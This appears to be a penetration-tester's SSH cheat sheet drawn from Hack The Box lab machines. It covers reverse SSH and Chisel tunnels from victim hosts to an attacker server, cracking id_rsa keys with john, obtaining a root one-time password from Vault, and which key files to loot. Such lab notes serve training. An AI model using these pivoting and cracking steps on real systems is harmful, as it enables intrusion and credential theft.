22 - SSH

$ nc -vn <IP> 22

Generate SSH Key

$ ssh-keygen -t rsa -b 4096 -f matt-id_rsa

No Matching Key Exchange

$ ssh root@beep.htb
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
$ ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 root@beep.htb

SSH Tunneling

// Remote tunnel from victim, enum victim port 5432 (postgresql)
ssh -N -f -R 5432:localhost:5432 p3@10.10.14.10

// Local tunnel from attacker, enum victim port 8002
ssh -N -f -L 8002:localhost:8002 hflaccus@carpediem.htb
ssh -N -f -L 3306:localhost:3306 charlie@extension.htb -i id_rsa

## Using Chisel to enumerate local webservices on remote host
// Chisel Server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 4444 -reverse

// Chisel Client (victim host)
$ ./chisel_1.7.7_linux_amd64 client 10.10.14.5:4444 R:8080:127.0.0.1:8080

## Using Chisel to setup a tunnel from compromized docker container to proxy
## traffic toward docker host (172.17.0.1:3000). 
// Chisel Server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 3333 -reverse

// Chisel Client (victim docker)
./chisel_1.7.7_linux_amd64 client 10.10.15.17:3333 R:127.0.0.1:3000:172.17.0.1:3000

Brute Force id_rsa

// Convert id_rsa (.pem) to hash with ssh2john, and crack with john.
$ ssh2john.py id_rsa > id_rsa.hash
$ john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt

Vault SSH OTP

Vault is used to provice one-time passwords (OTP) for SSH logins. To request a OTP you need to know the role example ssh/creds/otp_key_role, the role is found in secrets.sh. 

$ vault write ssh/creds/root_otp ip=10.10.10.110
Key                Value
---                -----
lease_id           ssh/creds/root_otp/bdbe45d6-24b0-6a02-8534-d37bbb3f54c5
lease_duration     768h
lease_renewable    false
ip                 10.10.10.110
key                1762e6a1-f975-61f8-814e-f7d65a2a1f51
key_type           otp
port               22
username           root

Interesing Files

ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa

Last updated